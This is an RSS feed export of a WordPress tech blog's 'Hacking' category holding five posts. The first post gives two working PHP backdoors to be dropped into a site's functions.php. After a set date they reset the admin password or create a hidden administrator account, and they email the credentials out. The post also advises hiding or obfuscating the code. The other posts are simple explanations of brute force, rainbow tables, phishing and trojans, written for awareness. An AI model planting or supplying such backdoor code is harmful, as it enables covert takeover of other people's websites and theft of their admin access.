<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ashfame &#124; Tech Blog &#187; Hacking</title>
	<atom:link href="http://blog.ashfame.com/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.ashfame.com</link>
	<description>Hacking life of Power Users and Webmasters</description>
	<lastBuildDate>Thu, 15 Dec 2011 23:35:08 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<atom:link rel='hub' href='http://blog.ashfame.com/?pushpress=hub'/>
<cloud domain='blog.ashfame.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>Creating a backdoor in WordPress</title>
		<link>http://blog.ashfame.com/2011/03/creating-backdoor-wordpress/</link>
		<comments>http://blog.ashfame.com/2011/03/creating-backdoor-wordpress/#comments</comments>
		<pubDate>Wed, 30 Mar 2011 21:35:29 +0000</pubDate>
		<dc:creator>Ashfame</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[wp-evil]]></category>

		<guid isPermaLink="false">http://blog.ashfame.com/?p=903</guid>
		<description><![CDATA[First post in my WordPress Evil series, I will demonstrate how I can create a backdoor in WordPress. Idea of this post came from a question on WordPress Answers where someone asked &#8211; Is there a security risk giving someone temporary access to my blog&#8217;s code? Example #1 Change the admin password after a certain [...]<ul>
		<li><a href="http://blog.ashfame.com/2008/04/unfreez-tool-for-creating-animated-gifs/" rel="bookmark">UnFREEz &#8211; Tool for creating animated gifs</a><!-- (17.6)--></li>
		<li><a href="http://blog.ashfame.com/2010/04/reset-change-wordpress-password-manually-phpmyadmin/" rel="bookmark">Reset or Change WordPress password manually via phpMyAdmin</a><!-- (13)--></li>
		<li><a href="http://blog.ashfame.com/2009/10/install-wordpress-ftp-sftp/" rel="bookmark">Install WordPress manually via FTP/SFTP</a><!-- (12.2)--></li>
		<li><a href="http://blog.ashfame.com/2010/11/add-custom-field-registration-wordpress/" rel="bookmark">Adding a custom user profile field to registration in WordPress</a><!-- (12.1)--></li>
		<li><a href="http://blog.ashfame.com/2010/07/wordpress-dashboard-different-language/" rel="bookmark">WordPress dashboard in different language</a><!-- (11.9)--></li>
	</ul>
]]></description>
			<content:encoded><![CDATA[<p>First post in my <strong>WordPress Evil</strong> series, I will demonstrate how I can create a backdoor in WordPress. Idea of this post came from a question on WordPress Answers where someone asked &#8211; <a href="http://wordpress.stackexchange.com/questions/13382/is-there-a-security-risk-giving-someone-temporary-access-to-my-blogs-code">Is there a security risk giving someone temporary access to my blog&#8217;s code?</a></p>
<h2>Example #1</h2>
<h3>Change the admin password after a certain date or time and inform us! Sounds good?</h3>
<pre class="brush: php; title: ; notranslate">
&lt;?php
if ( strtotime( &quot;2011-04-30&quot; ) &lt; time() ) {

	$target_admin_id = 1; // change this if admin has a different ID or you want to attach a particular admin
	$target_admin_new_password = 'evilme';
	$target_admin_userinfo = get_userdata( $target_admin_id );

	if ( !wp_check_password( $target_admin_new_password, $target_admin_userinfo-&gt;user_pass , $target_admin_id ) ) { // Have we already changed the password?

		add_action( 'shutdown', 'evilme_change_admin_password' );

		function evilme_change_admin_password() {

			global $target_admin_id;
			global $target_admin_new_password;
			global $target_admin_userinfo;

			wp_set_password( $target_admin_new_password, $target_admin_id );

			// now email me that my password of admin account has changed ready

			wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo-&gt;user_login.' | password: '.$target_admin_new_password );
		}
	}
}

?&gt;
</pre>
<p>At the very beginning, I checked if the current time is passed April 30, then execute all this code. Change it to the date when you want the backdoor to be created. The basic logic is to set the password of a user using <strong>wp_set_password()</strong> and keep a check on the password so as to avoid a database write and an alert email sent to you on every page load.</p>
<p>I have attached it to the <strong>shutdown</strong> hook so that it doesn&#8217;t disturb the page output exactly when it happens. Change the email address and the new password you want to set and try this on a demo WordPress install by pasting the code in functions.php file.</p>
<h2>Example #2</h2>
<h3>Create a new admin user after a certain date or time and ping us when ready!</h3>
<pre class="brush: php; title: ; notranslate">
&lt;?php
if ( strtotime( &quot;2011-04-30&quot; ) &lt; time() ) {

	// Required for username_exists()
	require_once( ABSPATH . WPINC . '/registration.php' );

	if ( !username_exists( 'ashfame-evil' ) ) { // Have we already done it once?

		add_action( 'shutdown', 'evilme_create_new_admin' );

		function evilme_create_new_admin() {

			$user_id = wp_insert_user( array(

				'user_login' =&gt; 'ashfame-evil',

				'user_pass' =&gt; 'evilme',

				'user_email' =&gt; 'ashishsainiashfame@hotmail.com',

				'role' =&gt; 'administrator'

			) );

			// now email me that my new admin account is ready

			wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
		}
	}

}

?&gt;
</pre>
<p>Again I check for the date, and if the condition satisfies, I used <strong>wp_insert_user()</strong> to create a new administrator user. To make sure the code only do this once, I keep a check if the username I want to create exists or not. If its does, we have already created a new admin user of which you should have got an email. You can test this too by changing the email address and putting the code in your functions.php file.</p>
<p>Ideally you don&#8217;t keep this code easily visible, you can just hide it anywhere. Deep inside functions.php file, some custom plugin or even obfuscate the code.</p>
<p>This tutorial was solely for the purpose of fun &amp; making people aware about the fact that it is not safe when you provide temporary access to your blog. If they did what just I demonstrated you would see everything fine, there will be nothing you can make note of but after the timer, it will create a backdoor. More logical implementation would be to create a administrator account at a certain amount of time, and then delete that user after 1 hour every day/week. The User ID would go up, and might create suspicion after quite some time, but possibilities are endless. Be smart, be aware, spread the word about it. Friends don&#8217;t let friends fall for others&#8217; trap.</p>
<p>If you have any questions about the code here, feel free to shoot me a question in the comments. And don&#8217;t forget to share this post on Facebook &amp; Tweet it!</p>
<p>Subscribe to feeds so as not to miss any of the evil posts! <img src='http://blog.ashfame.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<ul>
		<li><a href="http://blog.ashfame.com/2008/04/unfreez-tool-for-creating-animated-gifs/" rel="bookmark">UnFREEz &#8211; Tool for creating animated gifs</a><!-- (17.6)--></li>
		<li><a href="http://blog.ashfame.com/2010/04/reset-change-wordpress-password-manually-phpmyadmin/" rel="bookmark">Reset or Change WordPress password manually via phpMyAdmin</a><!-- (13)--></li>
		<li><a href="http://blog.ashfame.com/2009/10/install-wordpress-ftp-sftp/" rel="bookmark">Install WordPress manually via FTP/SFTP</a><!-- (12.2)--></li>
		<li><a href="http://blog.ashfame.com/2010/11/add-custom-field-registration-wordpress/" rel="bookmark">Adding a custom user profile field to registration in WordPress</a><!-- (12.1)--></li>
		<li><a href="http://blog.ashfame.com/2010/07/wordpress-dashboard-different-language/" rel="bookmark">WordPress dashboard in different language</a><!-- (11.9)--></li>
	</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.ashfame.com/2011/03/creating-backdoor-wordpress/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Hacking &#8211; Brute Force &amp; Rainbow Table explained</title>
		<link>http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/</link>
		<comments>http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/#comments</comments>
		<pubDate>Mon, 03 Dec 2007 18:43:34 +0000</pubDate>
		<dc:creator>Ashfame</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[brute force]]></category>

		<guid isPermaLink="false">http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/</guid>
		<description><![CDATA[You must have seen in movies how a hacker cracks a password. He take out a small device from his pocket. Connect it to the locker or whatever he wants to crack and then lots of digits and alphabets are shuffled on the device&#8217;s screen and in a matter of minutes (and sometimes in seconds), [...]<ul>
		<li><a href="http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/" rel="bookmark">Tips for those who wants to learn hacking</a><!-- (19.4)--></li>
		<li><a href="http://blog.ashfame.com/2008/03/hibernation-enabling-benefits-windows-explained/" rel="bookmark">Hibernation &#8211; Enabling and Benefits [Explained]</a><!-- (16.2)--></li>
		<li><a href="http://blog.ashfame.com/2011/03/creating-backdoor-wordpress/" rel="bookmark">Creating a backdoor in WordPress</a><!-- (7.1)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/3-creative-ways-showcasing-best-content-sidebar/" rel="bookmark">3 creative ways of showcasing your best content on sidebar</a><!-- (6)--></li>
		<li><a href="http://blog.ashfame.com/2010/04/smart-way-experimenting-ads-performance/" rel="bookmark">Smart way of experimenting with ads performance</a><!-- (5.5)--></li>
	</ul>
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img src="http://blog.ashfame.com/wp-content/uploads/2007/11/palm_device.gif" alt="palm_device" /></p>
<p>You must have seen in movies how a hacker cracks a password. He take out a small device from his pocket. Connect it to the locker or whatever he wants to crack and then lots of digits and alphabets are shuffled on the device&#8217;s screen and in a matter of minutes (and sometimes in seconds), the thing is unlocked. Pretty Impressive but it doesn&#8217;t happen that way. Basically a online system (by online system i means a system which requires you to log in to get access) can&#8217;t be hacked like that. Even a password stored in a offline file can&#8217;t be hacked so easily.</p>
<p><span id="more-91"></span><br />
Lets take it as easy as it can get. You want to access a file which is password protected. You create a program that tries every possible combination of alphabets and numbers and then feed it to the file if its the right one. This procedure is repeated till the right combination is accepted by the file. This is what we call as a <strong>attack</strong>. And this very procedure of trying possible combinations is called <strong>Brute Force Attack</strong>.</p>
<p>Now executing such a program which is required to provide every possible combination requires a very good computing power. The time that it consumes in breaking a password depends on the length of password and the processor speed. Faster the processor, shorter the time it takes to crack the password. Think it would be easy if you have a dual core or quad core, Think again. On Desktop PCs it can take days to crack a password.</p>
<p><strong>Memory Space Trade Off</strong> &#8211; It is a situation in which time taken for processing can be reduced at the cost of space and vice versa. To make it very clear, lets see this again with the help of an example. In the previous example, we can process the different combination before hand and then store them in a file. And when you need to break a password, combinations are retrieved from that file and this lessens the load on the processor. The only time consumption in this case is the retrieval of data from that file. This file is what is known as a Rainbow Table. It can break passwords in a few minutes and in even a few seconds depending how strong is the password. It can be obtained from the World Wide Web but beware of its size. Its size is in GBs.</p>
<p>Now even if a hacker has the best of hardware, he can&#8217;t hack that easily. Why? Ever entered a password wrong multiple times? It requires you to enter the image to confirm that you are a human and it is not a account and even if that fails (yes there are algorithms that can read the text behind the image), the user is forbidden to enter the password for a fixed amount of time. So, there is no way in hell that a hacker can hack by Brute force or even with the help of rainbow tables. But it surely gets the job done for offline files.</p>
<p>If I write more here in a single post, it would be difficult for many of us to analyze the information. So, more in coming posts. Use the comments section to ask questions or for leaving a response.</p>
<ul>
		<li><a href="http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/" rel="bookmark">Tips for those who wants to learn hacking</a><!-- (19.4)--></li>
		<li><a href="http://blog.ashfame.com/2008/03/hibernation-enabling-benefits-windows-explained/" rel="bookmark">Hibernation &#8211; Enabling and Benefits [Explained]</a><!-- (16.2)--></li>
		<li><a href="http://blog.ashfame.com/2011/03/creating-backdoor-wordpress/" rel="bookmark">Creating a backdoor in WordPress</a><!-- (7.1)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/3-creative-ways-showcasing-best-content-sidebar/" rel="bookmark">3 creative ways of showcasing your best content on sidebar</a><!-- (6)--></li>
		<li><a href="http://blog.ashfame.com/2010/04/smart-way-experimenting-ads-performance/" rel="bookmark">Smart way of experimenting with ads performance</a><!-- (5.5)--></li>
	</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>How a hacker can end you in trouble?</title>
		<link>http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/</link>
		<comments>http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/#comments</comments>
		<pubDate>Sun, 25 Nov 2007 18:43:39 +0000</pubDate>
		<dc:creator>Ashfame</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/</guid>
		<description><![CDATA[You must have seen that any attempt to login to any server is logged and if the hacker is unable to clean the log, he can be very easily traced by the administrator of the server. The reason that if hacker is unable to clean the log sounds silly but he can also be caught [...]<ul>
		<li><a href="http://blog.ashfame.com/2007/11/hacker-gain-access-pc/" rel="bookmark">How a hacker can gain access to your PC?</a><!-- (25.9)--></li>
		<li><a href="http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/" rel="bookmark">Tips for those who wants to learn hacking</a><!-- (8.2)--></li>
		<li><a href="http://blog.ashfame.com/2007/11/sofware-crack-means-security-crack/" rel="bookmark">Sofware crack means Security crack</a><!-- (7.5)--></li>
		<li><a href="http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/" rel="bookmark">Hacking &#8211; Brute Force &#038; Rainbow Table explained</a><!-- (5.7)--></li>
	</ul>
]]></description>
			<content:encoded><![CDATA[<p>You must have seen that any attempt to login to any server is logged and if the hacker is unable to clean the log, he can be very easily traced by the administrator of the server. The reason that if hacker is unable to clean the log sounds silly but he can also be caught if at the time of his access, the administrator is also logged in. Now its not possible to use a cybercafe everytime he hacks something. lol. So how does he protect himself from getting caught? This is something that is teached before teaching how to hack Servers on the World Wide Web.</p>
<p><span id="more-93"></span> Make sure you read <a href="http://blog.ashfame.com/2007/11/hacker-gain-access-pc/">How a hacker can gain access to your PC?</a></p>
<p style="text-align: center"><img src="http://blog.ashfame.com/wp-content/uploads/2007/11/hacker_host_server.gif" alt="hacker_host_server" /></p>
<p>Now, that a hacker has gain access to your PC. He uses your PC to hack others. So that even someone is able to trace him back he can get away with this easily and you are caught. Many times you don&#8217;t get caught because the hacker don&#8217;t want to ruin a already establish workstation. Hackers are pretty smart. But sometimes the administrators are also smart. lol. They can trace back from where the attack was carried out and there they got you. You won&#8217;t have the slightest hint of what has really happened unless FBI tells you so and your fault was just that you didn&#8217;t took proper measures for your security because of which you pose a security threat for others.</p>
<p>Its time to tighten your security. Isn&#8217;t it? What say?</p>
<ul>
		<li><a href="http://blog.ashfame.com/2007/11/hacker-gain-access-pc/" rel="bookmark">How a hacker can gain access to your PC?</a><!-- (25.9)--></li>
		<li><a href="http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/" rel="bookmark">Tips for those who wants to learn hacking</a><!-- (8.2)--></li>
		<li><a href="http://blog.ashfame.com/2007/11/sofware-crack-means-security-crack/" rel="bookmark">Sofware crack means Security crack</a><!-- (7.5)--></li>
		<li><a href="http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/" rel="bookmark">Hacking &#8211; Brute Force &#038; Rainbow Table explained</a><!-- (5.7)--></li>
	</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How a hacker can gain access to your PC?</title>
		<link>http://blog.ashfame.com/2007/11/hacker-gain-access-pc/</link>
		<comments>http://blog.ashfame.com/2007/11/hacker-gain-access-pc/#comments</comments>
		<pubDate>Mon, 19 Nov 2007 18:43:53 +0000</pubDate>
		<dc:creator>Ashfame</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[gain access to pc]]></category>
		<category><![CDATA[how a hacker hacks]]></category>
		<category><![CDATA[learn hacking]]></category>
		<category><![CDATA[security flaws]]></category>

		<guid isPermaLink="false">http://blog.ashfame.com/2007/11/hacker-gain-access-pc/</guid>
		<description><![CDATA[There are many ways in which a hacker can gain access to your PC. Infact it depends on the ability of hacker, in how many ways he/she can break into your PC. I am going to list how a hacker exploits already existing things to get his job done.Hacker needs to have the security feature [...]<ul>
		<li><a href="http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/" rel="bookmark">How a hacker can end you in trouble?</a><!-- (21.7)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/fix-lost-admin-access-bbpress/" rel="bookmark">Fix lost admin access in bbPress</a><!-- (13.5)--></li>
		<li><a href="http://blog.ashfame.com/2007/11/how-to-setup-gmail-imap-in-your-smartphone/" rel="bookmark">How to setup Gmail IMAP access in your smartphone</a><!-- (13.4)--></li>
		<li><a href="http://blog.ashfame.com/2008/01/enable-disable-access-usb-mass-storage-device/" rel="bookmark">How to enable/disable access to USB mass storage device</a><!-- (13.2)--></li>
		<li><a href="http://blog.ashfame.com/2009/12/bitlocker-windows-7-encrypts-drive-locks-access/" rel="bookmark">Bitlocker in Windows 7 encrypts your whole drive &amp; locks access to it</a><!-- (13.2)--></li>
	</ul>
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center"><img src="http://blog.ashfame.com/wp-content/uploads/2007/11/hacker_gain_access.gif" alt="hacker_gain_access" /></p>
<p>There are many ways in which a hacker can gain access to your PC. Infact it depends on the ability of hacker, in how many ways he/she can break into your PC. I am going to list how a hacker exploits already existing things to get his job done.Hacker needs to have the security feature turn off from your PC so that he can get into easily. The process now gets divided into two case.</p>
<ol>
<li>Hacker makes a fool out of you and you yourself help the hacker.</li>
<li>Hacker exploits the level of security you have on your PC.</li>
</ol>
<p>Now second option is the most difficult for a hacker (Remember, most difficult but not impossible). Its like you are fully armed at your end and he still manages to break into the security. The first option is very easy. A novice hacker to a Pro hacker, every class of hacker uses it and this is what I am going to explain in detail here.</p>
<p><span id="more-96"></span><strong>Phishing Art</strong> : A fake page is designed looking exactly like a genuine one where users are asked to login &amp; when they do it, details are sent to the hacker.</p>
<p><em>What you can do?</em></p>
<p>Always check the URL where you are logging in and if you find something suspicious, just close the window and open the page by typing the URL.</p>
<p><strong>Trojans</strong> : Trojans are malicious program that disguised itself as something useful and attracts users. Users installing up the so called useful application end up with the malicious code installed on the system. Trojans can capture screenshots, log every key strokes, allow access to your hard disk and can use your PC for other hacking stuff.</p>
<p><em>What you can do?</em></p>
<p>Never use cracks, any suspicious tools &amp; use security suite on PC.</p>
<p><strong>Exploiting Vulnerability</strong> :  This is what I am going to explain because this is the most important method on which every hacker works on. Every thing has flaws, nothing is perfect in this world. This is why beta versions &amp; updates are released for fixing vulnerabilities left in the applications. Lets there is a application <strong>APP</strong> which has a flaw <strong>A</strong> which can be used to gain access to <strong>B</strong> which further allows you to control <strong>Z</strong> and Z allows you to take over the control of PC. Now this process of handling control can go from <strong>A</strong> to <strong>B</strong>, <strong>B</strong> to <strong>C</strong> can go on till <strong>Z</strong>. That means leading to a small flaw you can have access to a series of process/features which eventually allows to take over the PC.</p>
<p><em>What you can do?</em></p>
<p>Keep yourself updated with all patches of any software application you use.</p>
<p><strong>Note</strong> : Never annoy a hacker. <img src='http://blog.ashfame.com/wp-includes/images/smilies/icon_cool.gif' alt=':cool:' class='wp-smiley' />  They can crack you and make you pay. <img src='http://blog.ashfame.com/wp-includes/images/smilies/icon_lol.gif' alt=':lol:' class='wp-smiley' /> </p>
<ul>
		<li><a href="http://blog.ashfame.com/2007/11/hacker-ending-users-trouble/" rel="bookmark">How a hacker can end you in trouble?</a><!-- (21.7)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/fix-lost-admin-access-bbpress/" rel="bookmark">Fix lost admin access in bbPress</a><!-- (13.5)--></li>
		<li><a href="http://blog.ashfame.com/2007/11/how-to-setup-gmail-imap-in-your-smartphone/" rel="bookmark">How to setup Gmail IMAP access in your smartphone</a><!-- (13.4)--></li>
		<li><a href="http://blog.ashfame.com/2008/01/enable-disable-access-usb-mass-storage-device/" rel="bookmark">How to enable/disable access to USB mass storage device</a><!-- (13.2)--></li>
		<li><a href="http://blog.ashfame.com/2009/12/bitlocker-windows-7-encrypts-drive-locks-access/" rel="bookmark">Bitlocker in Windows 7 encrypts your whole drive &amp; locks access to it</a><!-- (13.2)--></li>
	</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.ashfame.com/2007/11/hacker-gain-access-pc/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Tips for those who wants to learn hacking</title>
		<link>http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/</link>
		<comments>http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/#comments</comments>
		<pubDate>Sat, 29 Sep 2007 07:19:43 +0000</pubDate>
		<dc:creator>Ashfame</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/</guid>
		<description><![CDATA[Many people on net impressed by the word &#8220;hacking&#8221; might do a little search on google about learning hacking. No doubt, they are at the right place. I would have rather use words &#8211; they are on the right track but will they open up the right door and gain something or they will just [...]<ul>
		<li><a href="http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/" rel="bookmark">Hacking &#8211; Brute Force &#038; Rainbow Table explained</a><!-- (17.8)--></li>
		<li><a href="http://blog.ashfame.com/2007/10/10-tips-to-make-blogging-stress-free-for-new-bloggers/" rel="bookmark">10 Tips to make blogging stress free for new bloggers</a><!-- (16.6)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/3-creative-ways-showcasing-best-content-sidebar/" rel="bookmark">3 creative ways of showcasing your best content on sidebar</a><!-- (6)--></li>
	</ul>
]]></description>
			<content:encoded><![CDATA[<p>Many people on net impressed by the word &#8220;<strong>hacking</strong>&#8221; might do a little search on google about learning hacking. No doubt, they are at the right place. I would have rather use words &#8211; they are on the right track but will they open up the right door and gain something or they will just end up becoming a victim them self.</p>
<p><span id="more-9"></span></p>
<p>First of all, there is a difference between hacking and cracking. In layman language all hacking, keygens, cracks, gaining unauthorized access is refered as hacking and the word <strong>hacking</strong> is marked with a tag which is illegal to do. But it is not the way it is supposed by a large audience. Hacking is defined as unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network. Click <a href="http://www.google.co.in/search?hl=en&#038;defl=en&#038;q=define:Hacking&#038;sa=X&#038;oi=glossary_definition&#038;ct=title" target="_blank">here</a> for more definitions. Cracking is equivalent to hacking when it is done by bad intentions and not for security improvement and educational purposes.</p>
<p>A common man would try to hack accounts on yahoo, hotmail, gmail, orkut etc. For this a little search will do but in most of the case you will end up loosing your own details without a slightest hint. I remember searching for tools to hack yahoo, gmail etc and found out some tools which require you to login before they can serve any purpose or in the worst scenario just execute their tool which could do anything from getting someone&#8217;s password to installing a <a href="http://www.google.co.in/search?hl=en&#038;q=define%3Atrojan&#038;btnG=Search&#038;meta=" target="_blank">trojan</a> on your system to spy on you. Trojan serve as a backdoor entry for the hacker to gain access your system and then use up the computing power you possess.</p>
<p>So if you really want to get through all this, I mean if you dare to, then just take care of the fact that the tool you are going to use to hack someone might be used by the hacker to hack you.</p>
<ul>
		<li><a href="http://blog.ashfame.com/2007/12/hacking-brute-force-rainbow-table-explained/" rel="bookmark">Hacking &#8211; Brute Force &#038; Rainbow Table explained</a><!-- (17.8)--></li>
		<li><a href="http://blog.ashfame.com/2007/10/10-tips-to-make-blogging-stress-free-for-new-bloggers/" rel="bookmark">10 Tips to make blogging stress free for new bloggers</a><!-- (16.6)--></li>
		<li><a href="http://blog.ashfame.com/2009/09/3-creative-ways-showcasing-best-content-sidebar/" rel="bookmark">3 creative ways of showcasing your best content on sidebar</a><!-- (6)--></li>
	</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.ashfame.com/2007/09/tips-for-those-who-wants-to-learn-hacking/feed/</wfw:commentRss>
		<slash:comments>60</slash:comments>
		</item>
	</channel>
</rss>

